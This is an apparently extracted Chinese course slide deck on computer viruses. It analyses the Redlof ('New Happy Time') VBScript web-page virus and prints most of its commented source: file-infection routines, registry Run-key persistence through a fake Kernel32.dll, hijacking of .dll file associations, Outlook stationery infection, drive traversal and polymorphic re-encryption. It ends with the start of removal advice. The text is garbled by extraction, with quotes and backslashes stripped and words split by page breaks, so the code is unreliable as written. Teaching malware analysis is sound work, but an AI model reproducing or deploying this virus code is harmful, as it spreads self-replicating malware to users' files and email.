計算機病毒與防治54歡樂時光病毒實例.pptx

1、計算機病毒與防治計算機病毒與防治課程小組5-4網(wǎng)頁腳本病毒防治 歡樂時光病毒的特點及代碼分析5-4典型網(wǎng)頁病毒剖析計算機病毒與防治課程小組 歡樂時光病毒的手工清除新歡樂時光病毒特點病毒名稱： 新歡樂時光病毒類型： 網(wǎng)頁腳本病毒危險級別： 影響系統(tǒng)： Win 9X/ME/NT/2000英文名包括有：HTML.Redlof.A Symantec, VBS.Redlof AVP, VBS_REDLOF.A Trend, VBS/Redlof-A Sophos, VBS.KJ 金山, Script.RedLof 瑞星, VBS/KJ 江民計算機病毒與防治課程小組新歡樂時光病毒特點新歡樂時光病毒特點新歡

2、樂時光病毒是一個多變形、加密病毒，感染擴展名為.html, .htm, .asp, .php, .jsp, .htt和.vbs文件，同時該病毒會大量生成folder.htt和desktop.ini，并在%windir%System中生成一個名字叫Kernel.dll（Windows 9x/Me）或kernel32.dll（Windows NT/2000）的文件，修改.dll文件的打開方式，感染Outlook的信紙文件。感染這個病毒后有兩個明顯的特征：a.在每個目錄中都會生成folder.htt（帶毒文件）和desktop.ini（目錄配置文件）；b.電腦運行速度明顯變慢，在任務(wù)列表中可以看到有

3、大量的Wscript.exe程序在運行。計算機病毒與防治課程小組新歡樂時光病毒特點新歡樂時光病毒這個網(wǎng)頁病毒利用微軟IE的漏洞，通過感染一些.html, .htm, .asp, .php, .jsp, .htt和.vbs等文件進行傳播。然而由于病毒的本身特性，其傳播的途徑也有多種：a.通過網(wǎng)頁傳播。由于病毒會感染網(wǎng)頁文件，如果那些網(wǎng)站站長不小心將帶毒的網(wǎng)頁放到網(wǎng)站上，用戶不小心瀏覽了這些網(wǎng)頁就會被病毒感染了；b.通過局域網(wǎng)。當本地計算機設(shè)有可寫權(quán)限的共享目錄，或者訪問局域網(wǎng)上帶毒的計算機的時候就會感染病毒；對于Windows NT/2000系統(tǒng)，由于存在默認的管理用共享目錄，因此，管理員的疏忽

4、也可能會造成感染。c.通過電子郵件。如果發(fā)件人使用了帶毒的網(wǎng)頁文件作為信紙，或者信件中有帶毒的網(wǎng)頁文件，那么，只要收件人瀏覽了郵件，也會被感染病毒；d.通過移動介質(zhì)，如軟盤、移動硬盤、光盤等。由于病毒會生成folder.htt和desktop.ini，所以在打開移動介質(zhì)或打開其文件夾的時候，就會激活并感染病毒。 計算機病毒與防治課程小組新歡樂時光代碼分析Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk Sub KJ_start() 初始化變量 KJSetDim() 初始

5、化環(huán)境 KJCreateMilieu() 感染本地或者共享上與html所在目錄 KJLikeIt() 通過vbs感染Outlook郵件模板 KJCreateMail() 進行病毒傳播 KJPropagate()End Sub 計算機病毒與防治課程小組新歡樂時光病毒主運行程序代碼新歡樂時光代碼分析Function KJAppendTo(FilePath,TypeStr) On Error Resume Next 以只讀方式打開指定文件 Set ReadTemp = FSO.OpenTextFile(FilePath,1) 將文件內(nèi)容讀入到TmpStr變量中 TmpStr = ReadTemp.R

6、eadAll 判斷文件中是否存在“KJ_start()”字符串，若存在說明已經(jīng)感染，退出函數(shù)；若文件長度小于1，也退出函數(shù)。 If Instr(TmpStr,KJ_start() 0 Or Len(TmpStr) 1 Then ReadTemp.Close Exit Function End If 如果傳過來的類型是“htt“ ， 在文件頭加上調(diào)用頁面的時候加載KJ_start()函數(shù); 在文件尾追加html版本的加密病毒體。如果是”html” : 在文件尾追加調(diào)用頁面的時候加載KJ_start()函數(shù)和html版本的病毒體; 如果是vbs : 在文件尾追加vbs版本的病毒體 If TypeS

7、tr = htt Then ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,2) FileTemp.Write & vbCrLf & TmpStr & vbCrLf & HtmlText 函數(shù)功能：向指定類型的指定文件追加病毒計算機病毒與防治課程小組FileTemp.Close Set FAttrib = FSO.GetFile(FilePath) FAttrib.attributes = 34 Else ReadTemp.Close Set FileTemp = FSO.OpenTextFile(FilePath,8)If Ty

8、peStr = html Then FileTemp.Write vbCrLf & & vbCrLf & & vbCrLf & HtmlText ElseIf TypeStr = vbs Then FileTemp.Write vbCrLf & VbsText End If FileTemp.Close End If End Function 新歡樂時光代碼分析計算機病毒與防治課程小組新歡樂時光代碼分析計算機病毒與防治課程小組函數(shù)功能：改變子目錄以及盤符Function KJChangeSub(CurrentString,LastIndexChar) 判斷是否是根目錄 If LastIndex

9、Char = 0 Then 如果是根目錄 ：如果是C:，返回FinalyDisk盤，并將SubE置為0 如果不是C:，返回將當前盤符遞減1，并將SubE置為0 If Left(LCase(CurrentString),1) = LCase(c) Then KJChangeSub = FinalyDisk & : SubE = 0 Else KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1) - 1) & : SubE = 0 End If Else 如果不是根目錄，則返回上一級目錄名稱 KJChangeSub = Mid(CurrentStri

10、ng,1,LastIndexChar)End If End Function 新歡樂時光代碼分析計算機病毒與防治課程小組Function KJCreateMail() On Error Resume Next 如果當前執(zhí)行文件是html的，就退出函數(shù) If InWhere = html Then Exit Function End If 取系統(tǒng)盤的空白頁的路徑ShareFile = Left(WinPath,3) & Program FilesCommon FilesMicrosoft SharedStationeryblank.htm 如果存在這個文件，就向其追加病毒體 ,否則生成含有病毒體

11、的文件 If (FSO.FileExists(ShareFile) Then Call KJAppendTo(ShareFile,html) Else Set FileTemp = FSO.OpenTextFile(ShareFile,2,true) FileTemp.Write & vbCrLf & & vbCrLf & HtmlText FileTemp.Close End If 功能：感染郵件部分 新歡樂時光代碼分析計算機病毒與防治課程小組 取得當前用戶的ID和OutLook的版本 DefaultId = WsShell.RegRead(HKEY_CURRENT_USERIdentiti

12、esDefault User ID) OutLookVersion = WsShell.RegRead(HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressMediaVer) 激活信紙功能，并感染所有信紙 WsShell.RegWrite HKEY_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoftOutlook Express& Left(OutLookVersion,1) &.0MailCompose Use Stationery,1,REG_DWORD Call KJMailReg(HKEY

13、_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoftOutlook Express& Left(OutLookVersion,1) &.0MailStationery Name,ShareFile) Call KJMailReg(HKEY_CURRENT_USERIdentities&DefaultId&SoftwareMicrosoftOutlook Express& Left(OutLookVersion,1) &.0MailWide Stationery Name,ShareFile) 新歡樂時光代碼分析計算機病毒與防治課程小組WsShe

14、ll.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0OutlookOptionsMailEditorPreference,131072,REG_DWORD Call KJMailReg(HKEY_CURRENT_USERSoftwareMicrosoftWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360,blank)Call KJMailReg(HKEY_CURRENT

15、_USERSoftwareMicrosoftWindows NTCurrentVersionWindows Messaging SubsystemProfilesMicrosoft Outlook Internet Settings0a0d020000000000c000000000000046001e0360,blank) WsShell.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftOffice10.0OutlookOptionsMailEditorPreference,131072,REG_DWORD Call KJMailReg(HKEY_CUR

16、RENT_USERSoftwareMicrosoftOffice10.0CommonMailSettingsNewStationery,blank)KJummageFolder(Left(WinPath,3) & Program FilesCommon FilesMicrosoft SharedStationery) End Function 新歡樂時光代碼分析計算機病毒與防治課程小組Function KJCreateMilieu()On Error Resume Next TempPath = 判斷操作系統(tǒng)是NT/2000還是9X If Not(FSO.FileExists(WinPath

17、& WScript.exe) Then TempPath = system32 End If 為了文件名起到迷惑性，并且不會與系統(tǒng)文件沖突。 如果是NT/2000則啟動文件為systemKernel32.dll ，如果是9x啟動文件則為systemKernel.dll If TempPath = system32 Then StartUpFile = WinPath & SYSTEMKernel32.dll Else StartUpFile = WinPath & SYSTEMKernel.dll End If 添加Run值，添加剛才生成的啟動文件路徑 WsShell.RegWrite HKE

18、Y_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunKernel32,StartUpFile 功能：創(chuàng)建系統(tǒng)環(huán)境 新歡樂時光代碼分析計算機病毒與防治課程小組 拷貝前期備份的文件到原來的目錄 FSO.CopyFile WinPath & webkjwall.gif,WinPath & webFolder.htt FSO.CopyFile WinPath & system32kjwall.gif,WinPath & system32desktop.ini 向%windir%webFolder.htt追加病毒體 Call KJAppendT

19、o(WinPath & webFolder.htt,htt) 改變dll的MIME頭 ,改變dll的默認圖標 ,改變dll的打開方式WsShell.RegWrite HKEY_CLASSES_ROOT.dll,dllfile WsShell.RegWrite HKEY_CLASSES_ROOT.dllContent Type,application/x-msdownload WsShell.RegWrite HKEY_CLASSES_ROOTdllfileDefaultIcon,WsShell.RegRead(HKEY_CLASSES_ROOTvxdfileDefaultIcon) WsShe

20、ll.RegWrite HKEY_CLASSES_ROOTdllfileScriptEngine,VBScript WsShell.RegWrite HKEY_CLASSES_ROOTdllFileShellOpenCommand,WinPath & TempPath & WScript.exe %1 %* 新歡樂時光代碼分析計算機病毒與防治課程小組WsShell.RegWrite HKEY_CLASSES_ROOTdllFileShellExPropertySheetHandlersWSHProps,60254CA5-953B-11CF-8C96-00AA00B8708C WsShell.R

21、egWrite HKEY_CLASSES_ROOTdllFileScriptHostEncode,85131631-480C-11D2-B1F9-00C04F86C324 啟動時加載的病毒文件中寫入病毒體 Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true) FileTemp.Write VbsText FileTemp.Close End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：針對html文件進行處理，如果訪問的是本地的或者共享上的文件，感染目錄 Function KJLikeIt() 如果當前執(zhí)行文件不是html

22、的就退出程序 If InWhere html Then Exit Function End If ThisLocation = document.location 取得文檔當前路徑 If Left(ThisLocation, 4) = “file” Then 如果是本地或網(wǎng)上共享文件 ThisLocation = Mid(ThisLocation,9) 如果這個文件擴展名不為空，在ThisLocation中保存它的路徑 If FSO.GetExtensionName(ThisLocation) then ThisLocation = Left(ThisLocation,Len(ThisLoca

23、tion) - Len(FSO.GetFileName(ThisLocation) End If If Len(ThisLocation) 3 Then 如果ThisLocation的長度大于3就尾追一個 ThisLocation = ThisLocation & End If KJummageFolder(ThisLocation) 感染這個目錄 End If End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：如果注冊表指定鍵值不存在，則向指定位置寫入指定文件名Function KJMailReg(RegStr,FileName) On Error Resume Ne

24、xt 如果注冊表指定鍵值不存在，則向指定位置寫入指定文件名 RegTempStr = WsShell.RegRead(RegStr) If RegTempStr = Then WsShell.RegWrite RegStr,FileName End If End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：遍歷并返回目錄路徑Function KJOboSub(CurrentString) SubE = 0 TestOut = 0 Do While True TestOut = TestOut + 1 If TestOut 28 Then CurrentString = F

25、inalyDisk & : Exit Do End If On Error Resume Next 取得當前目錄的所有子目錄，并且放到字典中 Set ThisFolder = FSO.GetFolder(CurrentString) Set DicSub = CreateObject(Scripting.Dictionary) Set Folders = ThisFolder.SubFolders FolderCount = 0For Each TempFolder in Folders FolderCount = FolderCount + 1 DicSub.add FolderCount,

26、 TempFolder.Name Next 新歡樂時光代碼分析計算機病毒與防治課程小組 如果沒有子目錄了，就調(diào)用KJChangeSub返回上一級目錄或者更換盤符，并將SubE置1 If DicSub.Count = 0 Then LastIndexChar = InstrRev(CurrentString,Len(CurrentString)-1)SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,L

27、astIndexChar)SubE = 1 Else 如果存在子目錄 如果SubE為0，則將CurrentString變?yōu)樗牡?個子目錄If SubE = 0 Then CurrentString = CurrentString & DicSub.Item(1) & Exit Do Else 如果SubE為1，繼續(xù)遍歷子目錄，并將下一個子目錄返回 j = 0 新歡樂時光代碼分析計算機病毒與防治課程小組For j = 1 To FolderCount If LCase(SubString) = LCase(DicSub.Item(j) Then If j FolderCount Then Cu

28、rrentString = CurrentString & DicSub.Item(j+1) & Exit DoEnd If End IfNext LastIndexChar = InstrRev(CurrentString,Len(CurrentString)-1)SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1) CurrentString = KJChangeSub(CurrentString,LastIndexChar) End If End If Loop KJOboSub

29、 = CurrentString End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：病毒傳播Function KJPropagate()On Error Resume NextRegPathvalue = HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree DiskDegree = WsShell.RegRead(RegPathvalue) 如果不存在Degree這個鍵值，DiskDegree則為FinalyDisk盤 If DiskDegree = Then DiskDegree = FinalyDisk

30、& : End If 繼DiskDegree置后感染5個目錄 For i=1 to 5 DiskDegree = KJOboSub(DiskDegree) KJummageFolder(DiskDegree) Next 將感染記錄保存在HKEY_LOCAL_MACHINESoftwareMicrosoftOutlook ExpressDegree鍵值中 WsShell.RegWrite RegPathvalue,DiskDegree End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：感染指定目錄Function KJummageFolder(PathName) On E

31、rror Resume Next 取得目錄中的所有文件集 Set FolderName = FSO.GetFolder(PathName) Set ThisFiles = FolderName.Files HttExists = 0 For Each ThisFile In ThisFiles FileExt = UCase(FSO.GetExtensionName(ThisFile.Path) 判斷擴展名 若是HTM,HTML,ASP,PHP,JSP則向文件中追加HTML版的病毒體 若是VBS則向文件中追加VBS版的病毒體 若是HTT,則標志為已經(jīng)存在HTT了 If FileExt = HT

32、M Or FileExt = HTML Or FileExt = ASP Or FileExt = PHP Or FileExt = JSP Then Call KJAppendTo(ThisFile.Path,html) ElseIf FileExt = VBS ThenCall KJAppendTo(ThisFile.Path,vbs)ElseIf FileExt = HTT Then HttExists = 1 End IfNext 新歡樂時光代碼分析計算機病毒與防治課程小組 如果所給的路徑是桌面，則標志為已經(jīng)存在HTT了 If (UCase(PathName) = UCase(WinP

33、ath & Desktop) Or (UCase(PathName) = UCase(WinPath & Desktop)Then HttExists = 1 End If 如果不存在HTT 向目錄中追加病毒體 If HttExists = 0 Then FSO.CopyFile WinPath & system32desktop.ini,PathName FSO.CopyFile WinPath & webFolder.htt,PathName End If End Function 新歡樂時光代碼分析計算機病毒與防治課程小組功能：定義FSO,WsShell對象,取得最后一個可用磁盤卷標,生

34、成傳染用的加密字串 備份系統(tǒng)中的webfolder.htt和system32desktop.ini Function KJSetDim() On Error Resume Next Err.Clear 測試當前執(zhí)行文件是html還是vbs TestIt = WScript.ScriptFullname If Err Then InWhere = html Else InWhere = vbs End If 創(chuàng)建文件訪問對象和Shell對象If InWhere = vbs Then Set FSO = CreateObject(Scripting.FileSystemObject) Set Ws

35、Shell = CreateObject(WScript.Shell) Else 新歡樂時光代碼分析計算機病毒與防治課程小組Set AppleObject = document.applets(KJ_guest) AppleObject.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B) AppleObject.createInstance() Set WsShell = AppleObject.GetObject() AppleObject.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228) AppleObj

36、ect.createInstance() Set FSO = AppleObject.GetObject() End If Set DiskObject = FSO.Drives 判斷磁盤類型 0: Unknown,1: Removable,2: Fixed,3: Network,4: CD-ROM,5: RAM Disk 如果不是可移動磁盤或者固定磁盤就跳出循環(huán)。可能作者考慮的是網(wǎng)絡(luò)磁盤、CD-ROM、RAM Disk都是在比較靠后的位置。呵呵，如果C:是RAMDISK會怎么樣？ For Each DiskTemp In DiskObjectIf DiskTemp.DriveType 2 A

37、nd DiskTemp.DriveType 1 Then Exit For End IfFinalyDisk = DiskTemp.DriveLetter Next 新歡樂時光代碼分析計算機病毒與防治課程小組 此前的這段病毒體已經(jīng)解密，并且存放在ThisText中，現(xiàn)在為了傳播，需要對它進行再加密。Dim OtherArr(3)Randomize 隨機生成4個算子 For i=0 To 3 OtherArr(i) = Int(9 * Rnd) Next TempString = For i=1 To Len(ThisText)TempNum = Asc(Mid(ThisText,i,1)If

38、TempNum = 13 Then 對回車、換行(0 x0D,0 x0A)做特別的處理TempNum = 28 ElseIf TempNum = 10 ThenTempNum = 29End If 很簡單的加密處理，每個字符減去相應(yīng)的算子，那么在解密的時候只要按照這個順序每個字符加上相應(yīng)的算子就可以了。新歡樂時光代碼分析計算機病毒與防治課程小組TempChar = Chr(TempNum - OtherArr(i Mod 4)If TempChar = Chr(34) ThenTempChar = Chr(18)End IfTempString = TempString & TempChar

39、Next 含有解密算法的字串 UnLockStr = Execute(Dim KeyArr(3),ThisText&vbCrLf&KeyArr(0) = & OtherArr(0) & &vbCrLf&KeyArr(1) = & OtherArr(1) & &vbCrLf&KeyArr(2) = & OtherArr(2) & &vbCrLf&KeyArr(3) = & OtherArr(3) & &vbCrLf&For i=1 To Len(ExeString)&vbCrLf&TempNum = Asc(Mid(ExeString,i,1)&vbCrLf&If TempNum = 18 Th

40、en&vbCrLf&TempNum = 34&vbCrLf&End If&vbCrLf&TempChar = Chr(TempNum + KeyArr(i Mod 4)&vbCrLf&If TempChar = Chr(28) Then&vbCrLf&TempChar = vbCr&vbCrLf&ElseIf TempChar = Chr(29) Then&vbCrLf&TempChar = vbLf&vbCrLf&End If&vbCrLf&ThisText = ThisText & TempChar&vbCrLf&Next) & vbCrLf & Execute(ThisText)新歡樂時

41、光代碼分析計算機病毒與防治課程小組 將加密好的病毒體復(fù)制給變量 ThisText ThisText = ExeString = & TempString & 生成html感染用的腳本 HtmlText = & vbCrLf & document.write & & & & & & vbCrLf & & vbCrLf & & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & & vbCrLf & & vbCrLf & 生成vbs感染用的腳本VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & KJ_

42、start() 取得Windows目錄:GetSpecialFolder(n),0: WindowsFolder ,1: SystemFolder,2: TemporaryFolder 新歡樂時光代碼分析計算機病毒與防治課程小組 如果系統(tǒng)目錄存在webFolder.htt和system32desktop.ini，則用kjwall.gif文件名備份它們。 WinPath = FSO.GetSpecialFolder(0) & If (FSO.FileExists(WinPath & webFolder.htt) Then FSO.CopyFile WinPath & webFolder.htt,

43、WinPath & webkjwall.gif End If If (FSO.FileExists(WinPath & system32desktop.ini) Then FSO.CopyFile WinPath & system32desktop.ini,WinPath & system32kjwall.gif End If End Function 新歡樂時光行為分析中毒現(xiàn)象截圖新歡樂時光手工清除當計算機感染了“歡樂時光”病毒后建議在安全模式或純DOS中清除。因為該病毒在安全模式下不會被激活，所以可以放心地在安全模式下殺毒；在正常模式中清除需要對Windows系統(tǒng)有非常深入地了解，一般用戶是很難干